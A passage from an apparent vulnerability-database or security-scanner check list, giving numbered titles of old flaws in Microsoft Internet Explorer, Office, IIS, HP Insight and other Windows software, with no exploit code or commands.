(rpawinet.dll) code execution [63775] Microsoft Visio 2003 dynamic-linked library (mfc71enu.dll) code execution [63749] Microsoft Internet Explorer CSS code execution [63581] Microsoft Address Book insecure library loading code execution [63572] Microsoft Exchange Server RPC denial of service [63557] Microsoft Internet Explorer information disclosure [63556] Microsoft Internet Explorer element code execution [63555] Microsoft Internet Explorer HTML element code execution [63553] Microsoft Internet Explorer object code execution [63552] Microsoft Internet Explorer script information disclosure [63551] Microsoft Internet Explorer HTML object code execution [63545] Microsoft Sharepoint SOAP code execution [63543] Microsoft Publisher array indexing memory corruption code execution [63542] Microsoft Publisher memory corruption code execution [63541] Microsoft Publisher pubconv.dll code execution [63540] Microsoft Publisher pubconv.dll buffer overflow [63539] Microsoft Publisher pubconv.dll code execution [63536] Microsoft Office FlashPix code execution [63535] Microsoft Office FlashPix buffer overflow [63534] Microsoft Office TIFF image code execution [63533] Microsoft Office TIFF image files [63532] Microsoft Office TIFF image buffer overflow [63531] Microsoft Office PICT code execution [63530] Microsoft Office CGM Image buffer overflow [63514] Microsoft Outlook file attachment denial of service [62962] Microsoft Internet Explorer invalid flag code execution [62886] HP Insight Control Performance Management for Windows unspecified privilege escalation [62885] HP Insight Control Performance Management for Windows unspecified cross-site request forgery [62884] HP Insight Control Performance Management for Windows unspecified cross-site scripting [62883] HP Insight Control Performance Management for Windows information disclosure [62864] HP Insight Recovery for Windows information disclosure [62863] HP Insight Recovery for Windows unspecified cross-site scripting [62862] HP Insight Orchestration for Windows information disclosure [62861] HP Insight Orchestration for Windows unauthorized access [62860] HP Insight Managed System Setup Wizard for Windows information disclosure [62804] Microsoft Forefront Unified Access Gateway Sginurl.asp cross-site scripting [62803] Microsoft Forefront Unified Access Gateway Mobile Portal cross-site scripting [62802] Microsoft Forefront Unified Access Gateway Web monitor cross-site scripting [62801] Microsoft Forefront Unified Access Gateway spoofing [62792] Microsoft PowerPoint underflow code execution [62791] Microsoft PowerPoint PowerPoint buffer overflow [62788] Microsoft Office DLL code execution [62787] Microsoft Office SPID code execution [62786] Microsoft Office drawing code execution [62785] Microsoft Office art drawing code execution [62784] Microsoft Office RTF buffer overflow [62783] HP Insight Control Server Migration for Windows unauthorized access [62782] HP Insight Control Server Migration for Windows unspecified privilege escalation [62781] HP Insight Control Server Migration for Windows unspecified cross-site scripting [62778] HP Insight Control Power Management for Windows unspecified cross-site request forgery [62777] HP Insight Control Power Management for Windows unspecified cross-site scripting [62728] Microsoft Internet Explorer window.onerror information disclosure [62469] Oracle Sun Products Directory Server Enterprise Edition Identity Synchronization for Windows unspecified [62259] Novell Client for Windows ActiveX control denial of service [62186] Microsoft Internet Information Services directory names code execution [62146] Microsoft .NET Framework JIT compiler code execution [62128] Microsoft Foundation Class (MFC) library title buffer overflow [62117] Microsoft Excel ghost record type parsing code execution [62116] Microsoft Excel out-of-bounds memory write in parsing code execution [62115] Microsoft Excel real time data array record code execution [62114] Microsoft Excel extra out of boundary record parsing code execution [62113] Microsoft Excel negative future function code execution [62112] Microsoft Excel merge cell record pointer code execution [62111] Microsoft Excel out of bounds array code execution [62110] Microsoft Excel formula biff record code execution [62109] Microsoft Excel formula substream memory corruption code execution [62108] Microsoft Excel Lotus 1-2-3 file parsing code execution [62107] Microsoft Excel file format parsing code execution [62106] Microsoft Excel record parsing memory corruption code execution [62105] Microsoft Excel record parsing integer overflow code execution [62097] Microsoft Word Word file code execution [62096] Microsoft Word file code execution [62095] Microsoft Word indexes code execution [62094] Microsoft Word records buffer overflow [62093] Microsoft Word pointers code execution [62090] Microsoft Internet Explorer deleted object code execution [62089] Microsoft Internet Explorer script information disclosure [62088] Microsoft Internet Explorer deleted object code execution [62087] Microsoft Internet Explorer object code execution [62086] Microsoft Internet Explorer Anchor element information disclosure [62085] Microsoft Internet Explorer deleted object code execution [62084] Microsoft Internet Explorer CSS information disclosure [62083] Microsoft Internet Explorer toStaticHTML API information disclosure [62082] Microsoft Internet Explorer AutoComplete information disclosure [62079] Microsoft Word bookmarks code execution [62078] Microsoft Word return values code execution [62077] Microsoft Word stack code execution [62076] Microsoft Word index code execution [62075] Microsoft Word boundary check code execution [62074] Microsoft Word pointer code execution [61937] Microsoft Word MSO.dll denial of service [61916] Microsoft DRM technology ActiveX control code execution [61913] Microsoft Internet Explorer toStaticHTML cross-site scripting [61898] Microsoft ASP.NET padding information disclosure [61894] Microsoft Paint BMP denial of service [61636] Microsoft Exchange Server Outlook Web Access cross-site request forgery [61516] Microsoft WordPad Word 97 code execution [61513] Microsoft Internet Information Services (IIS) URL authentication bypass [61512] Microsoft Internet Information Services request header buffer overflow [61511] Microsoft Internet Information Services repeated POST denial of service [61509] Microsoft Outlook Online Mode buffer overflow [61393] Google Chrome Windows kernel unspecified [61067] Windows Live Messenger animation denial of service [60802] Google Chrome Windows kernel unspecified [60739] Microsoft Internet Explorer frame.frameBorder denial of service [60735] Microsoft .NET Framework CLR code execution [60733] Microsoft Word HTML linked objects code execution [60732] Microsoft Word RTF buffer overflow [60731] Microsoft Word RTF code execution [60730] Microsoft Word record code execution [60727] Microsoft Excel Excel file code execution [60712] Microsoft Internet Explorer uninitialized memory corruption code execution [60711] Microsoft Internet Explorer uninitialized memory corruption code execution [60710] Microsoft Internet Explorer race condition memory corruption code execution [60709] Microsoft Internet Explorer uninitialized memory corruption code execution [60708] Microsoft Internet Explorer uninitialized memory corruption code execution [60707] Microsoft Internet Explorer mouse information disclosure [60561] Microsoft Exchange Server Outlook Web Access cross-site request forgery [60522] Microsoft Clip Organizer ActiveX control denial of service [60478] A file containing Microsoft LNK data was detected [60290] HP Insight Orchestration for Windows unauthorized access [60289] HP Virtual Connect Enterprise Manager for Windows unspecified cross-site scripting [60288] HP Insight Control Server Migration for Windows unspecified cross-site request forgery [60287] HP Insight Control Server Migration for Windows unauthorized access [60286] HP Insight Control Power Management for Windows unauthorized access [60164] Microsoft Exchange Server OWA cross-site request forgery [60156] Microsoft Word Word file code execution [59948] Microsoft Internet Explorer mshtml.dll information disclosure [59894] Microsoft Outlook SMB code execution [59889] Microsoft Office ActiveX control code execution [59768] Microsoft Internet Explorer IFRAME information disclosure [59088] Microsoft Internet Explorer nntp:// URIs denial of service [59087] Microsoft Internet Explorer news:// URIs denial of service [59069] Microsoft Internet Explorer CSS expression denial of service [59060] Microsoft ASP.NET view state cross-site scripting [59057] Microsoft ASP.NET EnableViewStateMac cross-site scripting [59055] Microsoft ASP.NET InnerHtml property cross-site scripting [58954] Microsoft Dynamics GP password security bypass [58912] Microsoft Excel Office XML privilege escalation [58911] Microsoft Excel ADO code execution [58910] Microsoft Excel string code execution [58909] Microsoft Excel stack code execution [58908] Microsoft Excel EDG code execution [58907] Microsoft Excel Excel code execution [58906] Microsoft Excel HFPicture code execution [58905] Microsoft Excel Excel file code execution [58904] Microsoft Excel RTD code execution [58903] Microsoft Excel Excel code execution [58902] Microsoft Excel format code execution [58901] Microsoft Excel chart sheet substreams code execution [58900] Microsoft Excel object buffer overflow [58899] Microsoft Excel record code execution [58890] Microsoft SharePoint help page denial of service [58870] Microsoft Internet Explorer deleted object code execution [58869] Microsoft Internet Explorer IE8 Developer Toolbar code execution [58868] Microsoft Internet Explorer HTML element code execution [58867] Microsoft Internet Explorer object code execution [58866] Microsoft Internet Explorer toStaticHTML information disclosure [58864] Microsoft Internet Information Services (IIS) authentication code execution [58862] Microsoft Office COM code execution [58835] Microsoft Outlook Web Access (OWA) id cross-site scripting [58833] Microsoft Dynamics GP cipher information disclosure [58757] Microsoft Internet Explorer IFRAME element denial of service [58506] HP Insight Control server migration for Windows cross-site scripting [58496] Microsoft Internet Explorer Invisible Hand extension information disclosure [58346] Microsoft Visio DXF buffer overflow [58170] Microsoft Visual Basic for Applications (VBA) ActiveX control buffer overflow [58044] Microsoft Internet Explorer filter cross-site scripting [57990] Microsoft Internet Explorer XML unspecified [57978] Microsoft wireless keyboard XOR weak security [57783] DWG Windows FTP Server security bypass [57581] Microsoft Office Communicator SIP INVITE denial of service [57401] Microsoft Internet Explorer data structures denial of service [57387] Apple iTunes for Windows installation privilege escalation [57373] Microsoft MPEG Layer-3 buffer overflow [57340] Microsoft Visio index code execution [57339] Microsoft Visio attributes code execution [57338] Microsoft Internet Explorer 8 Developer Tools code execution [57327] Microsoft Office PublisherTextBox buffer overflow [57307] Microsoft Internet Explorer deleted object code execution [57306] Microsoft Internet Explorer URL code execution [57305] Microsoft Internet Explorer domain information disclosure [57304] Microsoft Internet Explorer HTML object code execution [57303] Microsoft Internet Explorer HTML object code execution [57302] Microsoft Internet Explorer deleted object code execution [57301] Microsoft Internet Explorer object code execution [57300] Microsoft Internet Explorer strings information disclosure [57299] Microsoft Internet Explorer object code execution [57197] Microsoft Internet Explorer unspecified code execution [57196] Microsoft Internet Explorer base address buffer overflow [56994] Microsoft Virtual PC and Microsoft Virtual Server Virtual Machine Monitor security bypass [56856] Skype for Windows skypePM.exe file deletion [56809] Skype for Windows URI handler information disclosure [56808] Microsoft Office AccWizObjects code execution [56772] Microsoft Internet Explorer use-after-free code execution [56651] Microsoft Internet Information Services DNS cross-site scripting [56597] Microsoft Sharepoint Upload.aspx cross-site scripting [56469] Microsoft Excel DbOrParamQry code execution [56468] Microsoft Excel XLSX code execution [56467] Microsoft Excel FNGROUPNAME code execution [56466] Microsoft Excel MDXSET buffer overflow [56465] Microsoft Excel MDXTUPLE buffer overflow [56464] Microsoft Excel object type code execution [56463] Microsoft Excel record memory code execution [56460] Microsoft Movie Maker and and Microsoft Producer buffer overflow [56431] Microsoft Internet Explorer CSS stylesheets information disclosure [56241] OpenOffice.org Microsoft Word file sprmTSetBrc buffer overflow [56240] OpenOffice.org Microsoft Word file sprmTDefTable buffer overflow [56093] Microsoft Internet Explorer URLMON security bypass [55931] Microsoft Office Office files buffer overflow [55929] Microsoft DirectShow AVI file buffer overflow [55927] Microsoft Paint JPEG integer overflow [55915] Microsoft Data Analyzer ActiveX Control code execution [55900] Microsoft Internet Explorer createElement denial of service [55889] Microsoft PowerPoint ViewerTextCharsAtom buffer overflow [55888] Microsoft PowerPoint Viewer TextBytesAtom buffer overflow [55887] Microsoft PowerPoint OEPlaceholderAtom code execution [55886] Microsoft PowerPoint placementId code execution [55885] Microsoft PowerPoint LinkedSlideAtom buffer overflow [55884] Microsoft PowerPoint file path buffer overflow [55863] Microsoft Internet Explorer multiple unspecified denial of service [55817] Windows Live Messenger ActiveX Control buffer overflow [55778] Microsoft Internet Explorer object memory code execution [55777] Microsoft Internet Explorer uninitialized code execution [55776] Microsoft Internet Explorer deleted object code execution [55775] Microsoft Internet Explorer initialized memory code execution [55774] Microsoft Internet Explorer deleted object code execution [55773] Microsoft Internet Explorer URL code execution [55676] Microsoft Internet Explorer ActiveX Control code execution [55642] Microsoft Internet Explorer freed object code execution [55483] Windows Live Messenger ActiveX control ViewProfile() denial of service [55308] Microsoft Internet Information Services colon security bypass [55154] Microsoft Silverlight code execution [55031] Microsoft Internet Information Services (IIS) filenames security bypass [54935] Wireshark Windows IPMI dissector denial of service [54463] Microsoft Internet Explorer cross-site scripting filter information disclosure [54444] Microsoft WordPad and Office Text Converter Word 97 file code execution [54423] Microsoft Office Project project code execution [54421] Microsoft Internet Explorer deleted object code execution [54420] Microsoft Internet Explorer uninitialized object code execution [54418] Microsoft Internet Explorer uninitialized object code execution [54399] Microsoft Internet Explorer PDF information disclosure [54367] Microsoft Internet Explorer CSS/Style code execution [54317] Microsoft Internet Explorer setHomePage denial of service [54234] Sun Java SE Windows Pluggable Look and Feel unspecified [54011] Microsoft Excel field code execution [54010] Microsoft Excel Excel records code execution [54009] Microsoft Excel Excel formulas code execution [54008] Microsoft Excel cell code execution [54007] Microsoft Excel BIFF records buffer overflow [54006] Microsoft Excel Featheader code execution [54005] Microsoft Excel SxView code execution [54004] Microsoft Excel cache code execution [53976] Microsoft Word Word file code execution [53955] Microsoft SharePoint download feature information disclosure [53937] Sun Solaris XScreenSaver popup windows information disclosure [53601] Microsoft Office 2008 for Mac user ID 502 security bypass [53543] Microsoft Internet Explorer uninitialized object code execution [53542] Microsoft Internet Explorer uninitialized code execution [53539] Microsoft Internet Explorer arguments code execution [53538] Microsoft Internet Explorer data stream headers code execution [53532] Microsoft Office BMP image code execution [53520] Microsoft Server Message Block (SMB) Protocol software command value code execution [53519] Microsoft Server Message Block (SMB) Protocol software denial of service [53417] Microsoft Internet KEYGEN denial of service [53414] Microsoft Internet window.print denial of service [53034] Microsoft Internet Information Services (IIS) directory listings denial of service [53005] Microsoft Internet Explorer window.open() spoofing [52926] Sophos PureMessage for Microsoft Exchange anti-virus and anti-spam unspecified vulnerability [52925] Sophos PureMessage for Microsoft Exchange EdgeTransport.exe denial of service [52915] Microsoft Internet Information Services (IIS) FTP buffer overflow [52897] Microsoft Internet Explorer JavaScript code denial of service [52889] Windows File Parameter Alteration [52870] Microsoft Internet Explorer integer value denial of service [52780] Microsoft .NET Framework CLR code execution [52765] Microsoft Internet Explorer XML denial of service [52762] Microsoft Internet Explorer Unicode string denial of service [52722] Microsoft Internet Explorer DIV element denial of service [52590] Microsoft Internet Explorer JavaScript SetAttribute denial of service [52276] Solaris XScreenSaver Xorg popup windows information disclosure [52273] Windows Security Support Provider Interface credential forwarding [52249] Microsoft Internet Explorer mshtml.dll denial of service [52243] Microsoft IIS With .NET Path Disclosure [52241] Microsoft IIS servervariables_vbscript.asp Information Disclosure [52240] Microsoft IIS Sample Application Physical Path Disclosure [52238] Microsoft FrontPage Server Extensions Vital Information Leakage [52237] Microsoft FrontPage Server Extensions To Do List Found [52236] Microsoft FrontPage Server Extensions Machine Name Disclosure [52235] Microsoft FrontPage Configuration Information Leakage [52234] Microsoft FrontPage '_vti_cnf' Information Leakage [52233] Microsoft IIS With .NET Path Disclosure [52106] Microsoft Message Queuing Service (MSMQ) IOCTL privilege escalation [52105] Microsoft Office Web Components ActiveX control buffer overflow [52087] Microsoft Active Template Library (ATL) variant code execution [52052] Microsoft Internet Explorer Active Template Library (ATL) ActiveX control killbit security bypass [52051] Microsoft Internet Explorer deleted objects code execution [52050] Microsoft Internet Explorer table operations code execution [52049] Microsoft Internet Explorer memory object code execution [52048] Microsoft Active Template Library (ATL) NULL string information disclosure [52047] Microsoft Active Template Library (ATL) object code execution [52044] Microsoft Active Template Library (ATL) header code execution [51972] Windows Live Messenger Marcelo Costa FileServer directory traversal [51637] Microsoft Internet Explorer AddFavorite buffer overflow [51616] Microsoft Internet Explorer cached certificate weak security [51552] Microsoft Internet Explorer Refresh header cross-site scripting [51467] Microsoft ISA Server Radius One Time Password (OTP) privilege escalation [51464] Microsoft Virtual PC and Microsoft Virtual Server privilege escalation [51461] Microsoft DirectX DirectShow code execution [51460] Microsoft Publisher pointer dereference code execution [51458] Microsoft DirectX QuickTime code execution [51454] Microsoft Office Web Components ActiveX control buffer overflow [51452] Microsoft Office Web Components ActiveX control HTML code execution [51451] Microsoft Office Web Components ActiveX control code execution [51378] Microsoft Internet Explorer connect response weak security [51186] Microsoft Internet Explorer https security bypass [50849] ATEN KH1516i and KN9116 IP KVM switch Windows and Java client RSA cryptography weak security [50831] Microsoft DirectX quartz.dll code execution [50794] Microsoft Word Word file buffer overflow [50793] Microsoft Word Word file buffer overflow [50790] Microsoft Excel record pointer code execution [50789] Microsoft Excel record integer overflow [50788] Microsoft Excel field code execution [50787] Microsoft Excel string buffer overflow [50786] Microsoft Excel array indexing code execution [50785] Microsoft Excel object record code execution [50784] Microsoft Excel pointer code execution [50775] Microsoft Internet Explorer HTML objects code execution [50774] Microsoft Internet Explorer HTML objects code execution [50773] Microsoft Internet Explorer HTML objects code execution [50772] Microsoft Internet Explorer object access code execution [50771] Microsoft Internet Explorer HTML code execution [50770] Microsoft Internet Explorer DHTML code execution [50769] Microsoft Internet Explorer cached data cross-domain security bypass [50764] Microsoft Print Spooler service information disclosure [50756] Microsoft Office Converter buffer overflow [50633] HP System Management Homepage (SMH) for Linux and Windows unspecified cross-site scripting [50573] Microsoft Internet Information Services (IIS) WebDAV security bypass [50553] Dream Windows MaxCMS inc/ajax.asp SQL injection [50529] Apple Mac OS X Microsoft Office Spotlight Importer code execution variant 1 [50494] Microsoft Internet Explorer utf-7 encoded characters cross-site scripting [50425] Microsoft PowerPoint sound data code execution [50354] McAfee GroupShield for Microsoft Exchange X- headers security bypass [50350] Microsoft Internet Explorer unprintable characters denial of service [50280] Microsoft PowerPoint atoms or data buffer overflow [50279] Microsoft PowerPoint notes buffer overflow [50278] Microsoft PowerPoint sound data buffer overflow [50277] Microsoft PowerPoint name strings buffer overflow [50276] Microsoft PowerPoint structures buffer overflow [50275] Microsoft PowerPoint string buffer overflow [50274] Microsoft PowerPoint sound PowerPoint 95 code execution [50273] Microsoft PowerPoint BuildList record code execution [50272] Microsoft PowerPoint sound data code execution [50271] Microsoft PowerPoint sound code execution [50270] Microsoft PowerPoint record types integer overflow [50269] Microsoft PowerPoint record header buffer overflow [49888] Microsoft Intelligent Application Gateway Whale Client Components ActiveX control buffer overflow [49632] Microsoft PowerPoint index value code execution [49575] Microsoft Wordpad Word 97 buffer overflow [49573] Microsoft Office WordPerfect 6.x Converter code execution [49572] Microsoft WordPad and Office Text Converter file code execution [49567] Microsoft ISA Server and Microsoft Forefront TMG cookieauth.dll cross-site scripting [49564] Microsoft ISAServer and Microsoft Forefront TMG Web proxy TCP state denial of service [49559] Microsoft DirectShow MJPEG code execution [49557] Microsoft Internet Explorer uninitialized memory code execution [49555] Microsoft Internet Explorer deleted memory code execution [49554] Microsoft Internet Explorer uninitialized memory code execution [49552] Microsoft Internet Explorer page transition code execution [49549] Microsoft Internet Explorer WinINet code execution [49544] Microsoft Excel object code execution [49389] Microsoft Internet Explorer unspecified code execution [49176] IBM Tivoli Storage Manager HSM for Windows client buffer overflow [49109] OpenBSD and Microsoft Interix fts_build function denial of service [48875] Microsoft Excel unspecified code execution [48815] Microsoft XML Core Services HTTPOnly Set-Cookie2 HTTP response headers information disclosure [48810] Windows Live Messenger Charset denial of service [48595] Microsoft Word 2007 Email as PDF information disclosure [48576] TFTP Windows PUT request detected [48542] Microsoft Internet Explorer onclick action click hijacking [48528] IBM WebSphere Application Server JSP Windows information disclosure [48337] WOW - Web On Windows ActiveX Control WriteIniFileString code execution [48335] Microsoft Internet Explorer HTML form value denial of service [48310] Microsoft Internet Explorer Cascading Style Sheets code execution [48309] Microsoft Internet Explorer CFunctionPointer code execution [48305] Microsoft Visio memory code execution [48303] Microsoft Visio object data copy code execution [48296] Microsoft Visio object data validation code execution [48294] Microsoft .NET Framework Type check code execution [48293] Microsoft .NET Framework CAS verification code execution [48023] Windows NTP Time Server Syslog Monitor syslog message denial of service [47974] Oracle Database SQLPlus Windows GUI component local information disclosure [47973] Oracle Database SQLPlus Windows GUI component remote information disclosure [47868] Microsoft HTML Help Workshop .hhp buffer overflow [47818] Windows Live Messenger Now Playing Plugin (gen_msn) plugin for Winamp gen_msn.dll buffer overflow [47788] Microsoft Internet Explorer JavaScript onload=screen attribute denial of service [47774] Microsoft Internet Explorer Scripting.FileSystem security bypass [47756] Microsoft Money prtstb06.dll ActiveX control denial of service [47738] Microsoft MSN Messenger IP address information disclosure [47671] Microsoft Exchange Server EMSMDB2 invalid MAPI commands denial of service [47670] Microsoft Exchange Server TNEF decoding code execution [47444] Microsoft Internet Explorer XDomainRequestAllowed header XSS filter bypass [47443] Microsoft Internet Explorer Location and Set-Cookie HTTP header XSS filter bypass [47442] Microsoft Internet Explorer X-XSS-Protection HTTP header XSS filter bypass [47441] Microsoft Internet Explorer Content-Type header XSS filter bypass [47277] Microsoft Internet Explorer CSS expression property XSS filter bypass [47258] Sun Ray Server Software and Sun Ray Windows Connector LDAP security bypass [47246] Microsoft Wordpad Text Converter for Word 97 buffer overflow [47208] Microsoft Internet Explorer data binding code execution [47182] Microsoft SQL Server sp_replwritetovarbin() buffer overflow [46878] Microsoft Excel file record code execution [46863] Microsoft Excel NAME record code execution [46862] Microsoft Excel spreadsheet formula code execution [46860] Microsoft Internet Explorer embedded object code execution [46859] Microsoft Internet Explorer deleted object code execution [46858] Microsoft Internet Explorer HTML objects uninitialized memory code execution [46857] Microsoft Internet Explorer parameter validation code execution [46854] Microsoft Office SharePoint access control privilege escalation [46852] Microsoft Word document table property buffer overflow [46851] Microsoft Word RTF stylesheet control word buffer overflow [46850] Microsoft Word RTF group control word buffer overflow [46849] Microsoft Word RTF drawing object buffer overflow [46848] Microsoft Word RTF drawing object code execution [46847] Microsoft Word malformed value code execution [46846] Microsoft Word RTF polyline and polygon buffer overflow [46731] Symantec Backup Exec for Windows Servers data management protocol buffer overflow [46730] Symantec Backup Exec for Windows Servers Backup Exec Remote Agent security bypass [46695] Microsoft .NET Framework SN weak security [46673] Microsoft Communicator SIP INVITE message unspecified denial of service [46671] Microsoft Communicator emoticon unspecified denial of service [46628] Microsoft Active Directory username information disclosure [46590] Microsoft Sharepoint HTML document cross-site scripting [46309] Microsoft Debug Diagnostic Tool DebugDiag ActiveX control denial of service [46235] Microsoft Internet Explorer high-bit address bar spoofing [46234] Microsoft Internet Explorer non-breaking space address bar spoofing [46189] Microsoft Visual Basic Charts ActiveX control code execution [46187] Microsoft Visual Basic Hierarchical Flexgrid ActiveX control code execution [46183] Microsoft Visual Basic Flexgrid ActiveX control code execution [46178] Microsoft Visual Basic Datagrid ActiveX control code execution [46061] Microsoft Outlook Web Access (OWA) redir.asp phishing [45854] Microsoft Internet Explorer script origin information disclosure [45746] Cisco Unity Microsoft API unspecified denial of service [45735] Microsoft PicturePusher ActiveX control file upload [45718] Microsoft Internet Explorer Extended HTML Form cross-site scripting [45656] XAMPP for Windows cds.php and phonebook.php SQL injection [45639] Microsoft Internet Explorer alert function denial of service [45584] Microsoft IIS adsiis.dll ActiveX control denial of service [45580] Microsoft Excel REPT code execution [45579] Microsoft Excel spreadsheet BIFF file format buffer overflow [45566] Microsoft Excel calendar object code execution [45564] Microsoft Internet Explorer uninitialized memory code execution [45563] Microsoft Internet Explorer componentFromPoint() code execution [45562] Microsoft Internet Explorer event handling cross-domain security bypass [45558] Microsoft Internet Explorer HTML cross-domain security bypass [45556] Microsoft IAS Helper COM ActiveX control denial of service [45555] Microsoft XML Core Services chunked transfer-encoding headers information disclosure [45554] Microsoft XML Core Services DTD information disclosure [45546] Microsoft Office Content-Disposition cdo:// protocol cross-site scripting [45537] Microsoft Message Queuing RPC code execution [45522] XAMPP for Windows adodb.php cross-site scripting [45507] Citrix Presentation Server for Windows unspecified privilege escalation [45420] Microsoft WordPad .doc denial of service [45225] Microsoft Internet Explorer PNG file denial of service [45214] Microsoft Visio installed [45211] Microsoft Project installed [45208] Microsoft Office installed [45207] Microsoft Internet Explorer installed [45186] Microsoft SQL Server 2000 SQLVDIRLib.SQLVDirControl ActiveX control buffer overflow [45007] Apple Bonjour for Windows mDNSResponder spoofing [45005] Apple Bonjour for Windows mDNSResponder denial of service [44993] Microsoft Organization Chart code execution [44775] PureMessage for Microsoft Exchange PMScanner.exe denial of service [44743] Microsoft ASP.NET ValidateRequest &quot [44741] Microsoft ASP.NET ValidateRequest &quot [44707] Microsoft Office OneNote file Uniform Resource Locator code execution [44704] Microsoft Host Integration Server SNA RPC code execution [44629] Windows Media Services ActiveX control (nskey.dll) CallHTMLHelp() method buffer overflow [44466] Symantec VERITAS Storage Foundation for Windows VxSchedService.exe code execution [44444] Microsoft Visual Studio Masked Edit ActiveX control buffer overflow [44098] Microsoft Internet Explorer print preview argument code execution [44097] Microsoft Internet Explorer table layout code execution [44096] Microsoft Internet Explorer XHTML object code execution [44095] Microsoft Internet Explorer object access code execution [44094] Microsoft Internet Explorer uninitialized memory code execution [44093] Microsoft Internet Explorer uninitialized memory code execution [44091] Microsoft Excel COUNTRY record value code execution [44090] Microsoft Excel FORMAT array index code execution [44089] Microsoft Excel chart AxesSet array index code execution [44088] Microsoft Excel credential caching unauthorized data access [44084] Microsoft Image Color Management InternalOpenColorProfile() buffer overflow [44078] Microsoft Event System index range code execution [44077] Microsoft Event System user subscriptions code execution [44069] Microsoft PowerPoint Viewer picture array index memory calculation code execution [44066] Microsoft PowerPoint Viewer CString object integer overflow [43950] Microsoft Internet Explorer cookie dot session hijacking [43869] F-PROT Antivirus Microsoft Office file denial of service [43676] Microsoft Internet Explorer frame String security bypass [43663] Microsoft Word record parsing code execution [43627] Microsoft Crypto API Certificate Revocation List (CRL) information disclosure [43613] Microsoft Snapshot Viewer ActiveX control code execution [43467] Microsoft Internet Explorer frame Object security bypass [43460] Novell Client for Windows NWFS.SYS privilege escalation [43413] Avaya Messaging Storage Server Windows domain parameters command execution [43366] Microsoft Internet Explorer location and location.href security bypass [43354] Microsoft Office WPG image filter buffer overflow [43353] Microsoft Office BMP image filter buffer overflow [43352] Microsoft Office PICT bits_per_pixel buffer overflow [43329] Microsoft Exchange Outlook Web Access HTML cross-site scripting [43328] Microsoft Exchange Outlook Web Access email fields cross-site scripting [43180] Microsoft Visual Basic Enterprise Edition vb6stkit.dll buffer overflow [43155] Microsoft Word unordered list code execution [43062] VMware COM API for Windows ActiveX control (VmCOM.dll) GuestInfo() method buffer overflow [42899] Microsoft IIS HTTP request smuggling [42804] Microsoft Internet Explorer setRequestHeader chunk security bypass [42692] Microsoft Internet Explorer substringData() buffer overflow [42690] Microsoft PowerPoint list parsing code execution [42683] Microsoft WINS network packet source privilege escalation [42679] Microsoft Outlook Express MHTML information disclosure [42526] Stunnel Windows privilege escalation [42416] Microsoft Internet Explorer &quot [42359] Novell Client for Windows username buffer overflow [42338] Microsoft Internet Explorer res:// URI info disclosure [42307] Microsoft Internet Explorer DisableCachingOfSSLPages weak security [42301] Microsoft OWA (Outlook Web Access) no-store information disclosure [42232] Microsoft Internet Explorer ActiveX string concatenation denial of service [42108] Microsoft Malware Protection Engine data structure denial of service [42107] Microsoft Malware Protection Engine file denial of service [42102] Microsoft Publisher object handler code execution [42100] Microsoft Word malformed CSS code execution [42099] Microsoft Word .rtf string code execution [41940] Microsoft HeartbeatCtl ActiveX control buffer overflow [41934] Microsoft SharePoint Services Picture Source cross-site scripting [41876] Microsoft Works ActiveX control (WkImgSrv.dll) code execution [41826] Microsoft Visual InterDev .SLN file Project line buffer overflow [41476] Microsoft Internet Explorer data stream code execution [41464] Microsoft Internet Explorer hxvz.dll object code execution [41462] Microsoft SQL Server memory INSERT statement buffer overflow [41461] Microsoft SQL Server stored backup file data structure buffer overflow [41460] Microsoft SQL Server convert() buffer overflow [41459] Microsoft SQL Server memory page reuse information disclosure [41452] Microsoft Visio file memory allocation code execution [41451] Microsoft Visio object header code execution [41447] Microsoft Project file memory allocation code execution [41411] Microsoft Internet Explorer setRequestHeader security bypass [41395] Apple Safari for Windows address bar spoofing [41388] Apple Safari for Windows .ZIP file code execution [41380] Microsoft Jet Database Engine Word file buffer overflow [41338] Microsoft Internet Explorer CreateTextRange method denial of service [41223] Novell GroupWise Windows client API security bypass [41156] Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) utility CSuserCGI.exe cross-site scripting [41154] Cisco Secure Access Control Server (ACS) for Windows User-Changeable Password (UCP) utility CSuserCGI.exe buffer overflow [41147] Microsoft Internet Explorer FTP command execution [41102] Citrix Presentation Server Client for Windows credential information disclosure [41070] Acronis True Image Echo Group Server Acronis True Image Windows Agent component denial of service [41057] Microsoft Internet Explorer Java and XML information disclosure [40932] Symantec Backup Exec for Windows Server Calendar ActiveX control file overwrite [40926] Symantec Backup Exec for Windows Server Calendar ActiveX control buffer overflow [40888] Microsoft Office file allocation error code execution [40887] Microsoft Office Excel file cell parsing code execution [40884] Microsoft Outlook mailto URI code execution [40878] Microsoft Excel conditioning formatting code execution [40877] Microsoft Excel rich text code execution [40876] Microsoft Excel formula calcuation code execution [40875] Microsoft Excel Style record data code execution [40874] Microsoft Excel .slk file import code execution [40873] Microsoft Excel data validation code execution [40735] Microsoft Internet Explorer danim.dll and lmrt.dll unspecified [40579] Microsoft Active Directory unspecified denial of service [40577] Microsoft Internet Explorer files denial of service [40467] Apple Mac OS X Windows File Sharing unspecified vulnerability [40400] Microsoft DirectSpeechSynthesis Module ActiveX control buffer overflow [40319] Microsoft Internet Explorer certificate spoofing [40316] Microsoft Works Converter section header index table information code execution [40314] Microsoft Publisher .pub invalid memory index code execution [40302] Microsoft MN-500 wireless base station configuration file information disclosure [40286] Microsoft Internet Explorer src attribute denial of service [40283] Microsoft Internet Explorer style attribute denial of service [40120] Skype for Windows SkypeFind cross-zone code execution [40100] Microsoft Word malformed string code execution [40096] Microsoft Works Converter field length information code execution [40095] Microsoft Works Converter section length header code execution [40092] Microsoft Publisher .pub invalid memory reference code execution [40090] Microsoft Internet Explorer argument data handling code execution [40089] Microsoft Internet Explorer property method code execution [40088] Microsoft Internet Explorer HTML layout positioning combination code execution [40087] Microsoft Internet Explorer multiple ActiveX control denial of service [40066] Microsoft Word object code execution [39975] Microsoft Class Package Export Tool clspack.exe buffer overflow [39773] Microsoft Visual Basic Enterprise Edition .dsr file buffer overflow [39755] Microsoft Visual InterDev .SLN buffer overflow [39754] Skype for Windows cross-zone code execution [39699] Microsoft Excel macro handling code execution [39576] Novell Client for Windows nicm.sys privilege escalation [39558] Microsoft FoxServer ActiveX control command execution [39557] Microsoft Rich Textbox ActiveX control file overwrite [39235] Microsoft IIS root folders file change notification privilege escalation [39230] Microsoft IIS HTML encoded ASP code execution [39209] Microsoft Word wordart denial of service [39208] Microsoft Office Publisher multiple denial of service [39158] Apache HTTP Server Windows SMB shares information disclosure [39113] Apple Mac OS X Microsoft Office Spotlight Importer code execution [39021] Microsoft Office XML document weak security [38908] Skype for Windows skype4com URI Handler buffer overflow [38883] Microsoft Optical Desktop information disclosure [38826] Microsoft Internet 